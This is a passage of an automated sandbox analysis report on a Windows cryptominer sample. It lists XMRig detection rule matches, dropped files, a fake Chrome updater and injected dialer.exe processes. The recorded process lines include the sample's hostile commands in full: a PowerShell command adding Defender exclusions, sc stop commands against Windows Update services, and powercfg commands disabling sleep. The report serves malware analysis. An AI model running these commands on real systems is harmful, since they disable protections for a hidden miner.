                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA712B2C51_2_000001A1CA712B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246ED7B1F2C53_2_00000246ED7B1F2C
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246ED7BD0E053_2_00000246ED7BD0E0
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246ED7C38A853_2_00000246ED7C38A8
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE62B2C53_2_00000246EDE62B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE6DCE053_2_00000246EDE6DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE744A853_2_00000246EDE744A8
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19B2B2C54_2_00000200A19B2B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19C44A854_2_00000200A19C44A8
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19BDCE054_2_00000200A19BDCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_000002259668DCE055_2_000002259668DCE0
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000225966944A855_2_00000225966944A8
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000022596682B2C55_2_0000022596682B2C
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                    Source: C:\Windows\System32\dialer.exeCode function: String function: 00007FF75E942F50 appears 31 times
                    Source: hiwA7Blv7C.exeStatic PE information: invalid certificate
                    Source: bzqlyietdwsj.tmp.0.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Source: updater.exe.0.drStatic PE information: Number of sections : 11 > 10
                    Source: hiwA7Blv7C.exeStatic PE information: Number of sections : 11 > 10
                    Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: dialer.exe PID: 1060, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@68/18@2/3
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,14_2_00007FF68D3D226C
                    Source: C:\Windows\System32\dialer.exeCode function: 42_2_00007FF64295226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,42_2_00007FF64295226C
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D19C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,14_2_00007FF68D3D19C4
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,14_2_00007FF68D3D226C
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5848:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6268:120:WilError_03
                    Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\qqgnfenfemxxtpha
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile created: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpJump to behavior
                    Source: hiwA7Blv7C.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: hiwA7Blv7C.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile read: C:\Users\user\Desktop\hiwA7Blv7C.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\hiwA7Blv7C.exe "C:\Users\user\Desktop\hiwA7Blv7C.exe"
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
